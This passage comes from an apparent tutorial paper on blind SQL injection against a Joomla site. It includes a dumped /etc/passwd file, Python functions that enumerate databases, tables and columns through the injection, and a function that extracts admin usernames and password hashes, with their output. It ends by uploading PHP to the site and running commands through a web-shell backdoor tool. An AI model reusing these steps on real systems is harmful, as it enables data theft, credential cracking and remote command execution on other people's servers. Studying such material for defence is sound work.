rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
tomcat:x:91:91:Tomcat:/usr/share/tomcat5:/bin/sh
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
The game is over, we can now proceed to a normal exploitation.
5. Databases discovery
It’s time to explore the database for juicy information. For that, we need to list every accessible
databases and tables.
Practical SQL Injection: bit by bit
5
def getr(data): return "".join([x for x in data if x != "\x00"])
def errorcheck(f):
""" Decorator to catch ValueError. """
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except ValueError:
print "[-] Could not proceed with the request."
wrapper.func_name = f.func_name
return wrapper
@errorcheck
def browse_database(dbo):
n = getr(dbo.query("SELECT count(distinct(db)) FROM mysql.db"))
for i in xrange(int(n)):
db = getr(dbo.query("SELECT distinct(db) FROM mysql.db LIMIT %d,1" % (i)))
print "[%s]" % (db)
m = getr(dbo.query("SELECT count(table_name) FROM " + \
"information_schema.tables WHERE " + \
"table_schema='%s'" % db))
for j in xrange(int(m)):
table = getr(dbo.query("SELECT table_name FROM " + \
"information_schema.tables WHERE " + \
"table_schema='%s' LIMIT %d,1" % (db, j)))
sys.stdout.write(" - %s[" % (table))
sys.stdout.flush()
l = getr(dbo.query("SELECT count(column_name) FROM " + \
"information_schema.columns WHERE " + \
"table_schema='%s' and table_name='%s'" %(db, table)))
for k in xrange(int(l)):
col = getr(dbo.query("SELECT column_name FROM " + \
"information_schema.columns WHERE " + \
"table_schema='%s' " % (db) + \
"and table_name='%s' LIMIT %d,1" % (table, k)))
sys.stdout.write("%s," % (col))
sys.stdout.flush()
print "\x08]"
Running the function browse_database prints us the database schema. For the purpose of the paper,
the content of the CMS has been changed by a default Joomla installation. However, the concept
remains the same.
>>> browse_database(q)
[jos]
- jos_banner[bid,cid,type,name,imptotal,impmade,clicks,imageurl,clickurl,date,
showBanner,checked_out,checked_out_time,editor,custombannercode]
- jos_bannerclient[cid,name,contact,email,extrainfo,checked_out,
checked_out_time,editor]
- jos_bannerfinish[bid,cid,type,name,impressions,clicks,imageurl,datestart,
dateend]
- jos_categories[id,parent_id,title,name,image,section,image_position,
description, published,checked_out,checked_out_time,editor,
ordering,access,count,params]
- jos_components[id,name,link,menuid,parent,admin_menu_link, admin_menu_alt,
option,ordering,admin_menu_img,iscore,params]
- jos_contact_details[id,name,con_position,address,suburb,state, country,
postcode,telephone,fax,misc,image,imagepos,email_to,
default_con, published,checked_out,checked_out_time,
Practical SQL Injection: bit by bit
6
ordering,params,user_id,catid,access]
- jos_content[id,title,title_alias,introtext,fulltext,state,sectionid,mask,
catid,created,created_by,created_by_alias,modified,modified_by,
checked_out,checked_out_time,publish_up,publish_down,images,urls,
attribs,version,parentid,ordering,metakey,metadesc,access,hits]
- jos_content_frontpage[content_id,ordering]
- jos_content_rating[content_id,rating_sum,rating_count,lastip]
- jos_core_acl_aro[aro_id,section_value,value,order_value,name,hidden]
- jos_core_acl_aro_groups[group_id,parent_id,name,lft,rgt]
- jos_core_acl_aro_sections[section_id,value,order_value,name,hidden]
- jos_core_acl_groups_aro_map[group_id,section_value,aro_id]
- jos_core_log_items[time_stamp,item_table,item_id,hits]
- jos_core_log_searches[search_term,hits]
- jos_equotes[id,quote,author,source,publish_up,publish_down,published]
- jos_groups[id,name]
- jos_mambots[id,name,element,folder,access,ordering,published,iscore,
client_id,checked_out,checked_out_time,params]
- jos_menu[id,menutype,name,link,type,published,parent,componentid,
sublevel,ordering,checked_out,checked_out_time,pollid,browserNav,
access,utaccess,params]
- jos_messages[message_id,user_id_from,user_id_to,folder_id,date_time,state,
priority,subject,message]
- jos_messages_cfg[user_id,cfg_name,cfg_value]
- jos_modules[id,title,content,ordering,position,checked_out,
checked_out_time,published,module,numnews,access,showtitle,
params,iscore,client_id]
- jos_modules_menu[moduleid,menuid]
- jos_newsfeeds[catid,id,name,link,filename,published,numarticles,cache_time,
checked_out,checked_out_time,ordering]
- jos_poll_data[id,pollid,text,hits]
- jos_poll_date[id,date,vote_id,poll_id]
- jos_poll_menu[pollid,menuid]
- jos_polls[id,title,voters,checked_out,checked_out_time,published,access,lag]
- jos_sections[id,title,name,image,scope,image_position,description,
published,checked_out,checked_out_time,ordering,access,
count,params]
- jos_session[username,time,session_id,guest,userid,usertype,gid]
- jos_stats_agents[agent,type,hits]
- jos_template_positions[id,position,description]
- jos_templates_menu[template,menuid,client_id]
- jos_users[id,name,username,email,password,usertype,block,sendEmail,
gid,registerDate,lastvisitDate,activation,params]
- jos_usertypes[id,name,mask]
- jos_weblinks[id,catid,sid,title,url,description,date,hits,published,
checked_out,checked_out_time,ordering,archived,approved,params]
[test]
- documents[id,name,lang]
[test\_%]
The interesting table is the one containing the users and the password hashes.
@errorcheck
def list_jos_users_hashes(dbo):
n = getr(dbo.query("SELECT count(id) FROM jos.jos_users"))
for i in xrange(int(n)):
printr(dbo.query("SELECT CONCAT(username,':',password) " + \
"FROM jos.jos_users LIMIT %d,1"%i))
>>> list_jos_users_hashes(q)
admin:5f4dcc3b5aa765d61d8327deb882cf99
Practical SQL Injection: bit by bit
7
6. Getting a shell
Logging with the administrator credentials, the uploading functionality was found insecure as well.
The content type wasn’t checked and it was possible to upload PHP code.
$ ./tricca.py
-=[ tricca v0.1]=-
Type 'usage()' for help.
Type 'config()' for current config.
>>> config.url = "http://host/documents/bd.php"
>>> ping()
Backdoor available ;-)
>>> shell("id")
uid=48(apache) gid=48(apache) groups=48(apache) context=root:system_r:httpd_t:s0
7. Conclusion
Whereas this attack was successful, it was really slow and produced a fair amount of logs. Under
normal circumstances, it is advised avoiding reading the database bit by bit.
I hope you enjoyed this little paper. Feedbacks and remarks are appreciated. I will probably write more on different topics in the near future. If you are interested, announcements will be done over my blog